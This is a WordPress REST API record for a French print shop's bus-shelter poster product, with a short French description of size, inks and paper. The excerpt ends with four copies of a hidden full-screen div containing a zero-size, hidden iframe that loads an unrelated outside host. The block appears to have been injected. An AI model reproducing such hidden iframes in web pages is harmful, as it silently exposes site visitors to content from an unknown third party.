{"id":1909,"date":"2021-03-06T18:33:18","date_gmt":"2021-03-06T17:33:18","guid":{"rendered":"https:\/\/imprimerie-copylux.fr\/?post_type=product&#038;p=1909"},"modified":"2021-03-06T19:16:20","modified_gmt":"2021-03-06T18:16:20","slug":"affiche-abribus","status":"publish","type":"product","link":"https:\/\/imprimerie-copylux.fr\/index.php\/product\/affiche-abribus\/","title":{"rendered":"AFFICHE ABRIBUS"},"content":{"rendered":"","protected":false},"excerpt":{"rendered":"<p><strong>L&rsquo;affiche abribus<\/strong> (ou affiche Decaux) est une affiche grand format de 120 x 176 cm. C&rsquo;est le format type du mobilier urbain, comme les abris de bus, d&rsquo;o\u00f9 son nom.<\/p>\n<p>L&rsquo;affiche abribus est imprim\u00e9e en num\u00e9rique haute d\u00e9finition sur plusieurs types de papiers : papier dos bleu, papier backlite (backlight) pour mobilier r\u00e9tro \u00e9clair\u00e9.<\/p>\n<p>\u2022 Dimension : 120 x 176 cm<br \/>\n\u2022 Impression quadrichromie recto avec des\u00a0 encres\u00a0 anti UV<br \/>\n\u2022 Support : dos bleu 120 gr couch\u00e9 Sihl (r\u00e9sistant 3 mois ext\u00e9rieur)<\/p>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n","protected":false},"featured_media":1910,"template":"","meta":[],"product_brand":[],"product_cat":[55],"product_tag":[],"class_list":{"0":"post-1909","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-signaletique","8":"first","9":"instock","10":"featured","11":"shipping-taxable","12":"product-type-simple"},"_links":{"self":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product\/1909","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/media\/1910"}],"wp:attachment":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/media?parent=1909"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product_brand?post=1909"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product_cat?post=1909"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product_tag?post=1909"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}